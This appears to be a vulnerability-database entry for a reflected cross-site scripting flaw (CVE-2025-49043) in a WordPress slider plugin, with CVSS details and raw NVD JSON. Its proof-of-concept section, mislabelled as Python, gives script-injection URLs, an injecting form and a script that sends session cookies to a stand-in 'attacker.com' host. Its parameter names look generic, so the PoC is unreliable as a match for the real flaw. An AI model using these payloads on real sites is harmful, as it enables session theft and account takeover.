Security Vulnerability Report
中文
CVE-2025-49043 CVSS 7.1 HIGH

CVE-2025-49043

Published: 2026-01-22 17:15:55
Last Modified: 2026-04-27 20:16:08

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel allows Reflected XSS.This issue affects Magic Responsive Slider and Carousel WordPress: from n/a through <= 1.6.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Magic Responsive Slider and Carousel (magic_carousel) <= 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-49043 PoC - Reflected XSS in WordPress Magic Carousel Plugin --> <!-- Target: WordPress site with Magic Responsive Slider and Carousel plugin <= 1.6 --> <!-- PoC URL Structure (modify target URL accordingly) --> <!-- https://target-site.com/?page_id=[slider_page_id]&param=<script>alert(document.cookie)</script> --> <!-- Example exploitation URL --> <!-- https://example.com/?page_id=123&carousel_id=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E --> <!-- HTML Form for testing --> <form action="https://target-site.com/" method="GET"> <input type="hidden" name="page_id" value="123"> <input type="hidden" name="carousel_id" value='"><script>alert(document.domain)</script>"> <input type="submit" value="Exploit XSS"> </form> <!-- JavaScript payload for cookie stealing --> <script> // Steal session cookies var cookies = document.cookie; var attacker_url = 'https://attacker.com/steal?c=' + encodeURIComponent(cookies); new Image().src = attacker_url; </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49043", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.280", "lastModified": "2026-04-27T20:16:08.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel allows Reflected XSS.This issue affects Magic Responsive Slider and Carousel WordPress: from n/a through <= 1.6."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel permite XSS Reflejado. Este problema afecta a Magic Responsive Slider and Carousel WordPress: desde n/a hasta &lt;= 1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/magic_carousel/vulnerability/wordpress-magic-responsive-slider-and-carousel-wordpress-plugin-1-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}